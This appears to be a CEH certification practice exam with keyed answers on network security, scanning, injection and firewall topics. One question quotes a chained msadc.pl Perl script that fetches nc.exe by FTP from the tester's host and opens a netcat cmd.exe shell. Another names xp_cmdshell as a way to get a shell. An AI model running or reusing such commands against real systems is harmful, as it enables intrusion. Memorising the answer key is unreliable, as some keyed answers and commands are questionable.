312-50 Certified Ethical Hacker Certification Practice Exam Set 3

One advantage of an application-level firewall is the ability to

Options are :

  • retain state information for each packet.
  • filter specific commands, such as http:post. (Correct)
  • filter packets at the network level.
  • monitor tcp handshaking.

Answer : filter specific commands, such as http:post.

The precaution of prohibiting employees from bringing personal computing devices into a facility is what type of security control?

Options are :

  • Compliance
  • Physical
  • Technical
  • Procedural (Correct)

Answer : Procedural

Which NMAP command combination would let a tester scan every TCP port from a class C network that is blocking ICMP with fingerprinting and service detection?

Options are :

  • NMAP -P0 -A -O -p1-65535 192.168.0/24 (Correct)
  • NMAP -P0 -A -sT -p0-65535 192.168.0/16
  • NMAP -PN -O -sS -p 1-1024 192.168.0/8
  • NMAP -PN -A -O -sS 192.168.2.0/24

Answer : NMAP -P0 -A -O -p1-65535 192.168.0/24

What is the main difference between a “Normal” SQL Injection and a “Blind” SQL Injection vulnerability?

Options are :

  • The attack is called “Blind” because, although the application properly filters user input, it is still vulnerable to code injection.
  • The successful attack does not show an error message to the administrator of the affected application.
  • The request to the web server is not visible to the administrator of the vulnerable application.
  • The vulnerable application does not display errors with information about the injection results to the attacker. (Correct)

Answer : The vulnerable application does not display errors with information about the injection results to the attacker.

The network administrator for a company is setting up a website with e-commerce capabilities. Packet sniffing is a concern because credit card information will be sent electronically over the Internet. Customers visiting the site will need to encrypt the data with HTTPS. Which type of certificate is used to encrypt and decrypt the data?

Options are :

  • Confidential
  • Non-confidential
  • Symmetric
  • Asymmetric (Correct)

Answer : Asymmetric

What is the main advantage that a network-based IDS/IPS system has over a host-based solution?

Options are :

  • They are placed at the boundary, allowing them to inspect all traffic.
  • They will not interfere with user interfaces.
  • They do not use host system resources. (Correct)
  • They are easier to install and configure.

Answer : They do not use host system resources.

Which of the following business challenges could be solved by using a vulnerability scanner?

Options are :

  • Auditors want to discover if all systems are following a standard naming convention.
  • There is an emergency need to remove administrator access from multiple machines for an employee that quit.
  • There is a monthly requirement to test corporate compliance with host application usage and security policies. (Correct)
  • A web server was compromised and management needs to know if any further systems were compromised.

Answer : There is a monthly requirement to test corporate compliance with host application usage and security policies.

A hacker is attempting to use nslookup to query Domain Name Service (DNS). The hacker uses the nslookup interactive mode for the search. Which command should the hacker type into the command shell to request the appropriate records?

Options are :

  • Set type=ns (Correct)
  • Request type=ns
  • Transfer type=ns
  • Locate type=ns

Answer : Set type=ns

Which of the following techniques does a vulnerability scanner use in order to detect a vulnerability on a target service?

Options are :

  • Injecting arbitrary data
  • Analyzing service response (Correct)
  • Port scanning
  • Banner grabbing

Answer : Analyzing service response

A company has hired a security administrator to maintain and administer Linux and Windows-based systems. Written in the nightly report file is the following:

  Firewall log files are at the expected value of 4 MB. The current time is 12am. Exactly two hours later the size has decreased considerably. Another hour goes by and the log files have shrunk in size again.

Which of the following actions should the security administrator take?

Options are :

  • Run an anti-virus scan because it is likely the system is infected by malware.
  • Log the event as suspicious activity and report this behavior to the incident response team immediately.
  • Log the event as suspicious activity, continue to investigate, and act according to the site's security policy. (Correct)
  • Log the event as suspicious activity, call a manager, and report this as soon as possible.

Answer : Log the event as suspicious activity, continue to investigate, and act according to the site's security policy.

From the two screenshots below, which of the following is occurring?

First one:

  [10.0.0.253]# nmap -sP 10.0.0.0/24

  Starting Nmap
  Host 10.0.0.1 appears to be up.
  MAC Address: 00:09:5B:29:FD:96 (Netgear)
  Host 10.0.0.2 appears to be up.
  MAC Address: 00:0F:B5:96:38:5D (Netgear)
  Host 10.0.0.4 appears to be up.
  Host 10.0.0.5 appears to be up.
  MAC Address: 00:14:2A:B1:1E:2E (Elitegroup Computer System Co.)
  Nmap finished: 256 IP addresses (4 hosts up) scanned in 5.399 seconds

Second one:

  [10.0.0.252]# nmap -sO 10.0.0.2

  Starting Nmap 4.01 at 2006-07-14 12:56 BST
  Interesting protocols on 10.0.0.2:
  (The 251 protocols scanned but not shown below are in state: closed)
  PROTOCOL STATE SERVICE
  1 open icmp
  2 open|filtered igmp
  6 open tcp
  17 open udp
  255 open|filtered unknown

  Nmap finished: 1 IP address (1 host up) scanned in 1.259 seconds

Options are :

  • 10.0.0.252 is performing an IP scan against 10.0.0.2, 10.0.0.252 is performing a port scan against 10.0.0.2.
  • 10.0.0.2 is performing an IP scan against 10.0.0.0/24, 10.0.0.252 is performing a port scan against 10.0.0.2.
  • 10.0.0.253 is performing an IP scan against 10.0.0.2, 10.0.0.252 is performing a port scan against 10.0.0.2.
  • 10.0.0.253 is performing an IP scan against 10.0.0.0/24, 10.0.0.252 is performing a port scan against 10.0.0.2. (Correct)

Answer : 10.0.0.253 is performing an IP scan against 10.0.0.0/24, 10.0.0.252 is performing a port scan against 10.0.0.2.

WPA2 uses AES for wireless data encryption at which of the following encryption levels?

Options are :

  • 128 bit and CCMP (Correct)
  • 128 bit and CRC
  • 64 bit and CCMP
  • 128 bit and TKIP

Answer : 128 bit and CCMP

What is the most secure way to mitigate the theft of corporate information from a laptop that was left in a hotel room?

Options are :

  • Set a BIOS password.
  • Use a strong logon password to the operating system.
  • Back up everything on the laptop and store the backup in a safe place.
  • Encrypt the data on the hard drive. (Correct)

Answer : Encrypt the data on the hard drive.

During a penetration test, a tester finds a target that is running MS SQL 2000 with default credentials. The tester assumes that the service is running with the Local System account. How can this weakness be exploited to access the system?

Options are :

  • Invoking the stored procedure xp_cmdshell to spawn a Windows command shell (Correct)
  • Invoking the stored procedure cmd_shell to spawn a Windows command shell
  • Invoking the stored procedure xp_shell to spawn a Windows command shell
  • Using the Metasploit psexec module setting the SA / Admin credential

Answer : Invoking the stored procedure xp_cmdshell to spawn a Windows command shell

Which of the following cryptography attack methods is usually performed without the use of a computer?

Options are :

  • Rainbow table attack
  • Ciphertext-only attack
  • Rubber hose attack (Correct)
  • Chosen key attack

Answer : Rubber hose attack

An organization hires a tester to do a wireless penetration test. Previous reports indicate that the last test did not contain management or control packets in the submitted traces. Which of the following is the most likely reason for lack of management or control packets?

Options are :

  • On Linux and Mac OS X, only 802.11 headers are received in promiscuous mode.
  • Certain operating systems and adapters do not collect the management or control packets. (Correct)
  • The wireless card was not turned on.
  • The wrong network card drivers were in use by Wireshark.

Answer : Certain operating systems and adapters do not collect the management or control packets.

A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows NT4 web server. While it is effective, the tester finds it tedious to perform extended functions. On further research, the tester comes across a perl script that runs the following msadc functions:

  system("perl msadc.pl -h $host -C \"echo open $your >testfile\"");
  system("perl msadc.pl -h $host -C \"echo $user>>testfile\"");
  system("perl msadc.pl -h $host -C \"echo $pass>>testfile\"");
  system("perl msadc.pl -h $host -C \"echo bin>>testfile\"");
  system("perl msadc.pl -h $host -C \"echo get nc.exe>>testfile\"");
  system("perl msadc.pl -h $host -C \"echo get hacked.html>>testfile\"");
  ("perl msadc.pl -h $host -C \"echo quit>>testfile\"");
  system("perl msadc.pl -h $host -C \"ftp \-s\:testfile\"");
  $o=;
  print "Opening ...\n";
  system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");

Which exploit is indicated by this script?

Options are :

  • A denial of service exploit
  • A chained exploit (Correct)
  • A SQL injection exploit
  • A buffer overflow exploit

Answer : A chained exploit

Firewalk has just completed the second phase (the scanning phase) and a technician receives the output shown below. What conclusions can be drawn based on these scan results?

  TCP port 21 – no response
  TCP port 22 – no response
  TCP port 23 – Time-to-live exceeded

Options are :

  • The lack of response from ports 21 and 22 indicate that those services are not running on the destination server.
  • The scan on port 23 was able to make a connection to the destination host prompting the firewall to respond with a TTL error.
  • The firewall itself is blocking ports 21 through 23 and a service is listening on port 23 of the target host.
  • The scan on port 23 passed through the filtering device. This indicates that port 23 was not blocked at the firewall. (Correct)

Answer : The scan on port 23 passed through the filtering device. This indicates that port 23 was not blocked at the firewall.

Which of the statements concerning proxy firewalls is correct?

Options are :

  • Firewall proxy servers decentralize all activity for an application.
  • Computers establish a connection with a proxy firewall which initiates a new network connection for the client. (Correct)
  • Proxy firewalls block network packets from passing to and from a protected network.
  • Proxy firewalls increase the speed and functionality of a network.

Answer : Computers establish a connection with a proxy firewall which initiates a new network connection for the client.

A network administrator received an administrative alert at 3:00 a.m. from the intrusion detection system. The alert was generated because a large number of packets were coming into the network over ports 20 and 21. During analysis, there were no signs of attack on the FTP servers. How should the administrator classify this situation?

Options are :

  • False positives (Correct)
  • True positives
  • False negatives
  • True negatives

Answer : False positives

During a penetration test, a tester finds that the web application being analyzed is vulnerable to Cross Site Scripting (XSS). Which of the following conditions must be met to exploit this vulnerability?

Options are :

  • The web application does not have the secure flag set.
  • The victim's browser must have ActiveX technology enabled.
  • The session cookies do not have the HttpOnly flag set. (Correct)
  • The victim user should not have an endpoint security solution.

Answer : The session cookies do not have the HttpOnly flag set.

A Network Administrator was recently promoted to Chief Security Officer at a local university. One of the employee's new responsibilities is to manage the implementation of an RFID card access system to a new server room on campus. The server room will house student enrollment information that is securely backed up to an off-site location.

During a meeting with an outside consultant, the Chief Security Officer explains that he is concerned that the existing security controls have not been designed properly. Currently, the Network Administrator is responsible for approving and issuing RFID card access to the server room, as well as reviewing the electronic access logs on a weekly basis.

Which of the following is an issue with the situation?

Options are :

  • Undue influence
  • Inadequate disaster recovery plan
  • Lack of experience
  • Segregation of duties (Correct)

Answer : Segregation of duties

During a penetration test, the tester conducts an ACK scan using NMAP against the external interface of the DMZ firewall. NMAP reports that port 80 is unfiltered. Based on this response, which type of packet inspection is the firewall conducting?

Options are :

  • Stateful
  • Stateless (Correct)
  • Host
  • Application

Answer : Stateless

Which set of access control solutions implements two-factor authentication?

Options are :

  • USB token and PIN (Correct)
  • Fingerprint scanner and retina scanner
  • Password and PIN
  • Account and password

Answer : USB token and PIN

One way to defeat a multi-level security solution is to leak data via

Options are :

  • steganography.
  • asymmetric routing.
  • a bypass regulator.
  • a covert channel. (Correct)

Answer : a covert channel.

A person approaches a network administrator and wants advice on how to send encrypted email from home. The end user does not want to have to pay for any license fees or manage server services. Which of the following is the most secure encryption protocol that the network administrator should recommend?

Options are :

  • Hyper Text Transfer Protocol with Secure Socket Layer (HTTPS)
  • IP Security (IPSEC)
  • Multipurpose Internet Mail Extensions (MIME)
  • Pretty Good Privacy (PGP) (Correct)

Answer : Pretty Good Privacy (PGP)

ICMP ping and ping sweeps are used to check for active systems and to check

Options are :

  • the route that the ICMP ping took.
  • if ICMP ping traverses a firewall. (Correct)
  • the location of the switchport in relation to the ICMP ping.
  • the number of hops an ICMP ping takes to reach a destination.

Answer : if ICMP ping traverses a firewall.

On a Linux device, which of the following commands will start the Nessus client in the background so that the Nessus server can be configured?

Options are :

  • nessus & (Correct)
  • nessus +
  • nessus -d
  • nessus *s

Answer : nessus &

A penetration tester is attempting to scan an internal corporate network from the internet without alerting the border sensor. Which is the most efficient technique the tester should consider using?

Options are :

  • Tunneling over high port numbers
  • Scanning using fragmented IP packets
  • Tunneling scan over SSH (Correct)
  • Spoofing an IP address

Answer : Tunneling scan over SSH

What technique is used to perform a Connection Stream Parameter Pollution (CSPP) attack?

Options are :

  • Setting a user's session identifier (SID) to an explicit known value
  • Inserting malicious Javascript code into input parameters
  • Injecting parameters into a connection string using semicolons as a separator (Correct)
  • Adding multiple parameters with the same name in HTTP requests

Answer : Injecting parameters into a connection string using semicolons as a separator
